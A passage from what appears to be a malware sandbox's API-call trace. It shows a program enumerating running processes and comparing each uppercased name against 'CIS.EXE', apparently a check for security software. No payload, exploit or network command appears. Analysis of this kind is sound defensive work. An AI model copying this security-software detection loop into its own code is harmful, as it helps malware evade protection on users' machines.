lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.225] lstrlenW (lpString="svchost.exe") returned 11 [0163.225] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.225] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.225] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.225] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.225] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.225] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.225] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="CIS.EXE") returned 1 [0163.225] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.226] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.226] lstrlenW (lpString="svchost.exe") returned 11 [0163.226] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.226] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.226] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.227] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: 
lpString1="taskhost.exe") returned="taskhost.exe" [0163.227] lstrlenW (lpString="taskhost.exe") returned 12 [0163.227] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.227] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.227] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.228] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.228] lstrlenW (lpString="taskeng.exe") returned 11 [0163.228] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.228] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CIS.EXE") returned 1 [0163.228] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.228] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.228] lstrlenW (lpString="dwm.exe") returned 7 [0163.228] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.228] lstrcmpW (lpString1="DWM.EXE", lpString2="CIS.EXE") returned 1 [0163.228] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.229] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.229] lstrlenW 
(lpString="explorer.exe") returned 12 [0163.229] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.229] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="CIS.EXE") returned 1 [0163.229] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.230] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.230] lstrlenW (lpString="taskeng.exe") returned 11 [0163.230] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.230] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CIS.EXE") returned 1 [0163.230] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.230] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.230] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.230] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.231] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="CIS.EXE") returned 1 [0163.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.231] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.231] lstrlenW (lpString="taskhost.exe") returned 12 
[0163.231] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.231] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.232] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.232] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.232] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.232] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="CIS.EXE") returned -1 [0163.232] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.233] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.233] lstrlenW (lpString="tri.exe") returned 7 [0163.233] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.233] lstrcmpW (lpString1="TRI.EXE", lpString2="CIS.EXE") returned 1 [0163.233] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.233] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.233] 
lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.234] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.234] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="CIS.EXE") returned 1 [0163.234] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.235] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.235] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.235] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.235] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="CIS.EXE") returned -1 [0163.235] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.236] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.236] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.236] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.236] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="CIS.EXE") returned 1 [0163.236] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.237] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.237] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.237] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.237] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="CIS.EXE") returned 1 [0163.237] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.238] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.238] lstrlenW (lpString="isolation.exe") returned 13 [0163.238] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.238] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="CIS.EXE") returned 1 [0163.238] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.238] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.238] lstrlenW (lpString="abc.exe") returned 7 [0163.238] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.238] lstrcmpW (lpString1="ABC.EXE", lpString2="CIS.EXE") returned -1 [0163.238] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.239] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.239] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.239] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.239] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="CIS.EXE") returned 1 [0163.239] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.240] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.240] lstrlenW (lpString="english_performing.exe") returned 22 [0163.240] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.240] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="CIS.EXE") returned 1 [0163.240] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.241] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.241] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.241] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 
[0163.241] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="CIS.EXE") returned 1 [0163.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.241] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.241] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.241] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.241] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="CIS.EXE") returned 1 [0163.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.242] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.242] lstrlenW (lpString="volume.exe") returned 10 [0163.242] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.242] lstrcmpW (lpString1="VOLUME.EXE", lpString2="CIS.EXE") returned 1 [0163.242] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.243] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.243] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.243] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 
| out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.243] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="CIS.EXE") returned 1 [0163.243] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.244] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.244] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.244] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.244] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="CIS.EXE") returned 1 [0163.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.244] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.244] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.244] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.244] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="CIS.EXE") returned 1 [0163.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.245] lstrcpyW (in: lpString1=0x18f6dc, 
lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.245] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.245] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.245] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="CIS.EXE") returned 1 [0163.245] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.246] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.246] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.246] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.246] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="CIS.EXE") returned 1 [0163.246] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.247] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.247] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.247] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.247] lstrcmpW (lpString1="EXCEL.EXE", lpString2="CIS.EXE") returned 1 [0163.247] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.247] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.247] lstrlenW (lpString="svchost.exe") returned 11 [0163.247] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.247] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.248] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.248] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.248] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.248] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="CIS.EXE") returned 1 [0163.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.249] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.249] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.249] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.249] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="CIS.EXE") returned 1 [0163.249] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.250] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.250] lstrlenW (lpString="svchost.exe") returned 11 [0163.250] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.250] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.250] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.250] lstrlenW (lpString="svchost.exe") returned 11 [0163.250] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.250] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.251] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.251] lstrlenW (lpString="winpoint.exe") returned 12 [0163.251] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.251] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="CIS.EXE") returned 1 [0163.251] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="cmd.exe")) returned 1 [0163.252] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.252] lstrlenW (lpString="cmd.exe") returned 7 [0163.252] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.252] lstrcmpW (lpString1="CMD.EXE", lpString2="CIS.EXE") returned 1 [0163.252] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.253] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.253] lstrlenW (lpString="conhost.exe") returned 11 [0163.253] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.253] lstrcmpW (lpString1="CONHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 